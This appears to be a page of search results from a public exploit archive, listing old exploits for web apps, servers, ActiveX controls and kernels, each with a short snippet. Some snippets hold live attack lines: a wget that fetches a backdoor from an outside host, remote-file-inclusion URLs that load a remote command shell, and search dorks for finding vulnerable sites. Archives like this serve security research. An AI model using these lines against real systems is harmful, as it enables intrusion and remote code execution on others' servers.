41207 matches found
Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow
Mozilla Firefox 3.5 OSX - Font Tags Remote Buffer Overflow !/usr/bin/env python FireFox 3.5 Heap Spray OS X Exploit Modified by: DrIDE Originally Discovered by: Simon Berry-Bryne Pythonized by: David Kennedy ReL1K @ SecureState Thanks to HDM Tested on OS X 10.5.7 from BaseHTTPServer import...
Linux Kernel 2.6.30 2.6.30.1 SELinux (RHEL 5) - Local Privilege Escalation
Linux Kernel 2.6.30 2.6.30.1 SELinux RHEL 5 - Local Privilege Escalation / super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun A vulnerability which, when viewed at the source level, is unexploitable! But which, thanks to gcc optimizations, becomes exploitable : Also, bypass of...
Multiple HTTP Server - slowloris.pl Low Bandwidth Denial of Service
Multiple HTTP Server - slowloris.pl Low Bandwidth Denial of Service !/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG'PIPE' = 'IGNORE'; Ignore broken pipe errors print EOTEXT;...
Joomla! Component com_rsgallery2 1.14.x2.x - Remote Backdoor Access
Joomla! Component comrsgallery2 1.14.x2.x - Remote Backdoor Access Vulnerability: Remote code execution back doors Software: RSGallery2 - Gallery Extension for Joomla! We are currently working on a new website. All files are still available at the JoomlaCode project page. Severity: Not a big deal...
MiniTwitter 0.2b - Remote User Options Changer
GnuTLS 2.6.x - libgnutls libpk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service
GnuTLS 2.6.x - libgnutls libpk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service // source: https://www.securityfocus.com/bid/34783/info GnuTLS is prone to multiple remote vulnerabilities: - A remote code-execution vulnerability - A denial-of-service vulnerability - A...
XRDP 0.4.1 - Remote Buffer Overflow (PoC)
XRDP 0.4.1 - Remote Buffer Overflow PoC / XRDP = 0.4.1 pre-auth remote PoC exploit. xrdp.sourceforge.net 01:59:56 root@crateria:/xrdp gcc -w -lssl -lX11 xrdp-poc.c -o xrdp-poc 02:00:29 root@crateria:/xrdp ./xrdp-poc 10.0.0.13 = Connected to 10.0.0.13 = Hit CTRL-C if the progress bar stops. Be...
Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities
Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities Louhi Networks Oy -= Security Advisory =- Advisory: Rittal CMC-TC Processing Unit II multiple vulnerabilities Release Date: 2009-03-23 Last Modified: 2009-03-22 Authors: Henri Lindberg, CISA henri d0t lindberg at louhi d0t fi Application...
Enomaly ECP Enomalism 2.2.1 - Multiple Local Vulnerabilities
Enomaly ECP Enomalism 2.2.1 - Multiple Local Vulnerabilities Enomaly ECP/Enomalism: Multiple vulnerabilities in enomalism2.sh redux Synopsis All versions of Enomaly ECP/Enomalism1 before 2.2.1 have multiple issues relating to the use of temporary files in an insecure manner. Fixes for...
Emefa Guestbook 3.0 - Remote Database Disclosure
Emefa Guestbook 3.0 - Remote Database Disclosure Title: Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability Credit: Cyber.Zer0 E-mail: Cyber.Zer04tHotmaildotcom Download: http://www.emefa.dyndns.org/downloads/ Remote: Yes Dork: "Emefa Guestbook V 3.0" --=Database Disclosure=--...
Web Calendar System 3.40 - Cross-Site Scripting SQL Injection
Joomla! Component Ignite Gallery 0.8.3 - SQL Injection
Joomla! Component Ignite Gallery 0.8.3 - SQL Injection Joomla Component Ignite Gallery SQL Injection Vulnerability Vulnerability found by: H!tm@N Contact: hitmanatkhg-crewdotws Site: www.khg-crew.ws Greetz: boom3rang, KHG, urtan, chs, redc00de - -=Kosova Hackers Group=- ScriptName: "Joomla"...
6rbScript 3.3 - singerid SQL Injection
6rbScript 3.3 - singerid SQL Injection 6rbScript V3.3 singerid Remote SQL Injection Vulnerability Author: Hussin X Home: WwW.IQ-ty.CoM | WwW.TrYaG.CC email: darkangelg85atYahooDoTcom script :...
Reciprocal Links Manager 1.1 - site SQL Injection
Reciprocal Links Manager 1.1 - site SQL Injection Reciprocal Links Manager 1.1 site Remote SQL Injection Vulnerability Author: Hussin X Home: WwW.Hussin-X.CoM | www.tryag.cc/cc email: darkangelg85atYahooDoTcom...
Pligg CMS 9.9.5 - CAPTCHA Registration Automation Security Bypass
Pligg CMS 9.9.5 - CAPTCHA Registration Automation Security Bypass source: https://www.securityfocus.com/bid/30518/info Pligg is prone to a security-bypass weakness. Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead...
Joomla! Component DBQuery 1.4.1.1 - Remote File Inclusion
PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution
PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution Date: 02/07/08 Note I modified a bit phpsploit for this exploit, because PHP Nuke plays with REQUESTURI var ... Requirements registerglobals=On phpreter phpreter is really easy to use: You can change mode using "mode=", with = sql, php or cmd If...
SNMPv3 - HMAC Validation error Remote Authentication Bypass
SNMPv3 - HMAC Validation error Remote Authentication Bypass snmpv3exp.sh exploit the vulnerability described in CVE-2008-0960, the HMAC check problem on multiple vendor Copyright c 2008 @ Mediaservice.net Srl. All rights reserved Wrote by Maurizio Agazzini http://lab.mediaservice.net/...
C6 Messenger - ActiveX Remote Download and Execute
C6 Messenger - ActiveX Remote Download and Execute !-- C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit by Nine:Situations:Group::SnoopyAssault site: http://retrogod.altervista.org/ "C6 Messenger is an instant messaging program produced by Telecom Italia...
Creative Software AutoUpdate Engine - ActiveX Stack Overflow
Creative Software AutoUpdate Engine - ActiveX Stack Overflow +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably. Original Advisory @...
VideoLAN VLC Media Player 0.8.6d - httpd_FileCallBack Remote Format String
VideoLAN VLC Media Player 0.8.6d - httpdFileCallBack Remote Format String / Epibite // bite since 1442 pown meme ta mamie / / Advisory from Luigi Auriemma CVE-2007-6682 / format string in VideoLAN VLC 0.8.6d Description : Format string vulnerability in the httpdFileCallBack function network/httpd...
sCssBoard (Multiple Versions) - pwnpack Remote s
sCssBoard Multiple Versions - pwnpack Remote s #!/usr/bin/ruby inphex - i didn't include all of those bugs into the code, this code basically checks if the forum is vulnerable and also exploits SQL Injection bug! all versions on sourceforge seem to be the same ;\ so check is being done on each versio...
Rejetto HTTP File Server (HFS) 1.52.x - Multiple Vulnerabilities
Rejetto HTTP File Server HFS 1.52.x - Multiple Vulnerabilities source: https://www.securityfocus.com/bid/27423/info HFS HTTP File Server is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a...
PHP Webquest 2.6 - Get Database Credentials
PHP Webquest 2.6 - Get Database Credentials PHP Webquest 2.6 Get Database's Credential Author: MhZ91...
BadBlue 2.72 - PassThru Remote Buffer Overflow
BadBlue 2.72 - PassThru Remote Buffer Overflow !/usr/bin/perl -w http://aluigi.altervista.org/adv/badblue-adv.txt https://www.securityfocus.com/bid/26803 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379 exploit for stack overflow in badblue 2.72 Credit to Luigi Auriemma Jacopo Cervini...
EZContents 1.4.5 - index.php?link Remote File Disclosure
EZContents 1.4.5 - index.php?link Remote File Disclosure -------------------------------------------------------------- ezContents Version 1.4.5 Remote File Disclosure Vulnerability. -------------------------------------------------------------- download : http://www.visualshapers.com/ author :...
ht:Dig 3.2 - Htsearch Cross-Site Scripting
ht:Dig 3.2 - Htsearch Cross-Site Scripting source: https://www.securityfocus.com/bid/26610/info ht://Dig is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue allows an attacker to execute arbitrary HTML or script code...
nuseo PHP enterprise 1.6 - Remote File Inclusion
nuseo PHP enterprise 1.6 - Remote File Inclusion Vulnerability Type: Remote File Inclusion Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseoadmind.php Exploit URL:...
modifyform - modifyform.html Remote File Inclusion
modifyform - modifyform.html Remote File Inclusion modifyform RFI author: mozi original post: http://darkcode.h1x.com/forum/ dork: inurl: modifyform.html?code= thanks: str0ke, d3hydr8 milw0rm.com 2007-09-18...
ID Automation Linear Barcode - ActiveX Denial of Service
ID Automation Linear Barcode - ActiveX Denial of Service 2007/05/13 -------------------------------------------------------------------------------------------------- ID Automation Linear Barcode ActiveX Control IDAutomationLinear6.dll v. 1.6.0.5 DoS url: http://www.idautomation.com/ price: from...
Beacon 0.2.0 - splash.lang.php Remote File Inclusion
Beacon 0.2.0 - splash.lang.php Remote File Inclusion Beacon = 2.0 Remote file inclusion languagePath Download script : http://download.savannah.gnu.org/releases/beacon/beacon020.zip Thanks Str0ke Exploit: http://victime.com/pbeaconpath/beacon/language/1/splash.lang.php?languagePath=shell.txt?...
Microsoft Windows - Animated Cursor .ani Local Stack Overflow
Microsoft Windows - Animated Cursor .ani Local Stack Overflow / Copyright c 2007 devcode ^^ D E V C O D E ^^ Windows .ANI LoadAniIcon Stack Overflow CVE-2007-1765 Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to take complete...
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize...
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation 2 source: https://www.securityfocus.com/bid/20471/info The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability. A successful exploit of this iss...
OpenDock Easy Blog 1.4 - doc_directory File Inclusion
OpenDock Easy Blog 1.4 - docdirectory File Inclusion ECHOADV50$2006 ----------------------------------------------------------------------------------------------- ECHOADV50$2006OpenDock Easy Blog =1.4 docdirectory Multiple Remote File Inclusion Vulnerability...
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage...
PixelPost 1-5rc1-2 - Privilege Escalation
PixelPost 1-5rc1-2 - Privilege Escalation !/usr/bin/php -q -d shortopentag=on ? echo "Pixelpost = 1-5rc1-2 privilege escalation exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: pixelpost "RSS 2.0" "ATOM feed" "Valid xHTML / Valid...
EQdkp 1.3.0 - dbal.php Remote File Inclusion
EQdkp 1.3.0 - dbal.php Remote File Inclusion Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls...
SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)
SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow Metasploit This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core...
BlueCoat WinProxy 6.0 R1c - GET Denial of Service
BlueCoat WinProxy 6.0 R1c - GET Denial of Service !perl "WinProxy 6.0 R1c" Remote DoS Exploit Author: FistFucker e-Mail: [email protected] Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363 CVE info: CAN-2005-3187 use IO::Socket; destination IP address $ip =...
ATutor 1.4.3 - content.php?cid Cross-Site Scripting
ATutor 1.4.3 - content.php?cid Cross-Site Scripting source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of...
Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...
PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting
PHPHeaven PHPMyChat 0.14.5 - Style.CSS.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/13628/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary scri...
paNews 2.0b4 - Remote Admin Creation SQL Injection
paNews 2.0b4 - Remote Admin Creation SQL Injection / paNews v2.0b4 silePNEWSxpl This exploit utilize SQL injection for create a new user with admin privileges on paNews software system. References: packetstormsecurity.org/0503-exploits/panews.txt coded by: Silentium of Anacron Group Italy date:...
CA License Server - GETCONFIG Remote Buffer Overflow
CA License Server - GETCONFIG Remote Buffer Overflow / Computer-Associates, License Service Stack Overflow Homepage: ca.com Affected version: v1.61 and below in eTrust, Unicenter, BrightStor, etc.. Patched version: hotfix Link: ca.com Date: 04 March 2005 Application Risk: Tsunami Internet Risk:...
D-Forum 1.11 - Nav.php3 Cross-Site Scripting
D-Forum 1.11 - Nav.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/12720/info D-Forum is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. As a result of this vulnerability, it is...
Star Wars Battlefront 1.1 - Fake Players Denial of Service
Star Wars Battlefront 1.1 - Fake Players Denial of Service / Copyright 2004 Luigi Auriemma This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at...
Dropbear SSH 0.34 - Remote Code Execution
Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...
Linux Kernel 2.2.252.4.242.6.2 - mremap() Local Privilege Escalation
Linux Kernel 2.2.252.4.242.6.2 - mremap Local Privilege Escalation / mremap missing domunmap return check kernel exploit gcc -O3 -static -fomit-frame-pointer mremappte.c -o mremappte ./mremappte suid shell Vulnerable kernel versions are all include include include include include include include...
RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - MDTM Remote Overflow
RhinoSoft Serv-U FTPd Server 3.x4.x5.x - MDTM Remote Overflow / exservu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit Copyright c SST 2004 All rights reserved. Public version BUG find by bkbll [email protected], cool! :ppPPppPPPpp :D code by Sam and 2004/01/07 Revise History...